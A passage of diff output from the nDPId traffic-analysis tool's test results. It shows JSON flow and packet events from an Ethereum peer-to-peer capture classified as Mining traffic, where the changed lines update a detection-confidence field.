rlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA="} 
00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/
0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="} 01011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
01977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsNQuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="} 
00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="} 